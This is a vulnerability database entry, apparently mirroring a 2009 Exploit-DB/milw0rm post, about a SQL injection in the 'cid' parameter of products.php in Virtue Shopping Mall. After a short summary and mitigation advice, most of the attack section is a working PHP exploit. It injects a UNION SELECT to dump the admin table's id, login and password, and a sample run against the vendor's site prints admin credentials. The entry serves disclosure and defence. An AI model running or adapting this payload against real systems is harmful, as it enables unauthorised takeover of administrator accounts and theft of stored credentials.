SQL Injection in Virtue Shopping Mall

vendor:

Virtue Shopping Mall

by:

Gretz

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Virtue Shopping Mall

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SQL Injection in Virtue Shopping Mall

An attacker can exploit a SQL injection vulnerability in Virtue Shopping Mall to gain access to the admin credentials. The attacker can send a specially crafted HTTP request to the vulnerable application, which will then execute the malicious SQL statements. The attacker can then use the retrieved information to gain access to the admin credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

CMS : Virtue Shopping Mall
WEB  : http://www.virtuenetz.com/mall/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]

Exploit :
<?
$web  = $argv[1];
$url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>


undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/

ID :1
Usuario : admin
Password : admin

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

# milw0rm.com [2009-06-08]